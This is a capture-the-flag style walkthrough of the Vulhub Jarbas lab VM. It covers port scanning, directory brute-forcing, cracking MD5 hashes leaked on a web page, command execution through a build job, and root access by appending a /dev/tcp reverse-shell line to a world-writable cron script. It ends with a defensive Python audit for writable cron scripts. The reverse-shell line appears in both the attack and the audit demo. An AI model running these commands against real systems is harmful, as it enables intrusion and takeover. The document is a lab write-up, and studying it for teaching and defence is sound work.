vulhub:Jarbas

Port scan

kali@kali [~/web_shell_toos] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.41.138                       [0:41:13]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-20 00:41 CST
Nmap scan report for 192.168.41.138
Host is up (0.0010s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy
MAC Address: 00:0C:29:A5:68:07 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.10 seconds

Detailed scan

kali@kali [~] ➜  sudo nmap -sT -sV -sC -p22,80,3306,8080 -O 192.168.41.138                                [23:41:39]
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 23:42 CST
Nmap scan report for 192.168.41.138
Host is up (0.00043s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
| 256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
|_ 256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Jarbas - O Seu Mordomo Virtual!
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
| http-methods:
|_ Potentially risky methods: TRACE
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
MAC Address: 00:0C:29:A5:68:07 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.58 seconds

Attacking port 80

[screenshot 1: the site on port 80]

Had a look at the site and found nothing of note, so let's start with directory brute-forcing.

kali@kali [~] ➜  sudo dirsearch -u http://192.168.41.138                                               [0:40:29]
[sudo] kali 的密码:
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_192.168.41.138/_25-02-20_00-45-10.txt

Target: http://192.168.41.138/

[00:45:19] 200 - 359B - /access.html

Task Completed

Visiting /access.html yields several usernames and password hashes.

kali@kali [~] ➜  curl http://192.168.41.138/access.html                                                [0:46:14]
<html>
<title>New Agile version!</title>
<body>
<h2>
<p align=center> Creds encrypted in a safe way!</h2></p>
<p align=center> <img src="geoffrey.jpg" alt="Geoffrey"></p>
<p align=center> tiago:5978a63b4654c73c60fa24f836386d87<br>
trindade:f463f63616cb3f1e81ce46b39f882fd5<br>
eder:9b38e2b1e8b12f426b0d208a7ab6cb98<br>
</p>
</p>
</body>
</html>

These look like plain MD5 hashes, so let's crack them with john.

kali@kali [~] ➜  john --format=Raw-MD5 x                                                               [0:51:45]

Using default input encoding: UTF-8
Loaded 3 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 9 candidates buffered for the current salt, minimum 24 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
marianna (trindade)
vipsu (eder)
italia99 (tiago)
3g 0:00:02:21 DONE 3/3 (2025-02-20 00:54) 0.02114g/s 35986Kp/s 35986Kc/s 37262KC/s italia03..italien7
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

With the passwords cracked, and SSH and 3306 open, I tried brute-forcing those directly, but hydra got nowhere, so I had to look for another login entry and finally found the one on port 8080.

[screenshot 2: login page on port 8080]

After logging in, we create a project and find that it allows command execution, so we go straight for a reverse shell.

[screenshot 3: project configuration with the command to execute]

Start a listener, then click "Build Now"; the command runs and we get a shell.

Privilege escalation

[screenshot 4: the shell obtained from the build]

The shell we got has very low privileges: many commands fail, ip addr for example, and wget can't download files either, so we can only enumerate manually and look for a foothold.

bash-4.2$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
bash-4.2$ cat /etc/cortab
cat /etc/cortab
cat: /etc/cortab: No such file or directory
bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
bash-4.2$

We found a bash script; let's take a closer look at it.

bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt
bash-4.2$ ls -la /etc/script
ls -la /etc/script
total 16
drwxr-xr-x. 2 root root 31 Apr 1 2018 .
drwxr-xr-x. 83 root root 8192 Feb 19 13:15 ..
-rwxrwxrwx. 1 root root 50 Apr 1 2018 CleaningScript.sh

The script itself doesn't matter; what matters is that we have write permission on it and the cron job runs it as root, so we can simply append a reverse shell to it.

bash-4.2$ echo "/bin/bash -i >& /dev/tcp/192.168.41.133/4444 0>&1" >> /etc/script/CleaningScript.sh
<i >& /dev/tcp/192.168.41.133/4444 0>&1" >> /etc/script/CleaningScript.sh
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt
/bin/bash -i >& /dev/tcp/192.168.41.133/4444 0>&1

kali@kali [~] ➜  nc -lvnp 4444                                                                                                                    [1:04:21]
listening on [any] 4444 ...
connect to [192.168.41.133] from (UNKNOWN) [192.168.41.138] 47144
bash: no job control in this shell
[root@jarbas ~]# whoami
whoami
root
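The whole privilege escalation rests on one misconfiguration: a script run by root from /etc/crontab that is mode 777. The audit below is an added example (my code, not from the page or the Jarbas author) of the check a system owner can run to catch exactly this: it parses the system crontab format shown above (five time fields, user, command), finds the script each job executes, and flags scripts that are group- or world-writable, scripts run as root but not owned by root, and scripts that already contain a /dev/tcp style redirection like the line appended above. The sample crontab and script are constructed in a temp directory so the block runs offline; `build_demo`, `audit_crontab` and the other names are mine.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Shape of the line appended to CleaningScript.sh above: a bash
# network redirection that should never appear in a cron script.
NET_REDIRECT_RE = re.compile(r"/dev/(tcp|udp)/\S+")


def parse_system_crontab(text: str):
    """Return (user, command) pairs from /etc/crontab-style text
    (comments, blank lines and VAR=value assignments are skipped)."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 6)
        if fields[0].startswith("@"):            # @reboot user command
            if len(fields) < 3:
                continue
            user, command = fields[1], " ".join(fields[2:])
        else:                                    # m h dom mon dow user command
            if len(fields) < 7:
                continue
            user, command = fields[5], fields[6]
        jobs.append((user, command))
    return jobs


def audit_job(user: str, command: str):
    """Findings (strings) for one cron job; empty list means nothing flagged."""
    findings = []
    path = Path(command.split()[0])              # what cron actually executes
    if not path.is_absolute() or not path.exists():
        return findings
    st = path.stat()
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: group/world-writable "
                        f"({stat.filemode(st.st_mode)}) but runs as {user}")
    if user == "root" and st.st_uid != 0:
        findings.append(f"{path}: runs as root but is owned by uid {st.st_uid}")
    try:
        body = path.read_text(errors="replace")
    except OSError:
        return findings
    if NET_REDIRECT_RE.search(body):
        findings.append(f"{path}: contains a /dev/tcp style network redirection")
    return findings


def audit_crontab(text: str):
    """Run audit_job over every job in the given crontab text."""
    findings = []
    for user, command in parse_system_crontab(text):
        findings.extend(audit_job(user, command))
    return findings


def build_demo():
    """Constructed sample, not taken from the target: a temp copy of the
    page's CleaningScript.sh, made mode 777 with the appended line, plus a
    crontab entry pointing at it. Returns (crontab_text, script_path)."""
    d = tempfile.mkdtemp()
    script = Path(d) / "CleaningScript.sh"
    script.write_text("#!/bin/bash\n\nrm -rf /var/log/httpd/access_log.txt\n"
                      "/bin/bash -i >& /dev/tcp/192.168.41.133/4444 0>&1\n")
    os.chmod(script, 0o777)
    crontab = (f"SHELL=/bin/bash\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\n"
               f"# example job\n*/5 * * * * root {script} >/dev/null 2>&1\n")
    return crontab, script


if __name__ == "__main__":
    crontab_text, _ = build_demo()
    for finding in audit_crontab(crontab_text):
        print("FINDING:", finding)
```

Run it against the real file with `audit_crontab(Path("/etc/crontab").read_text())` (and the same over /etc/cron.d/*). The fix for what it reports on this box is ownership root:root and mode 0755 (or tighter) on /etc/script/CleaningScript.sh, plus a file-integrity baseline on cron scripts so a later append is noticed at the next check rather than at the next reverse shell.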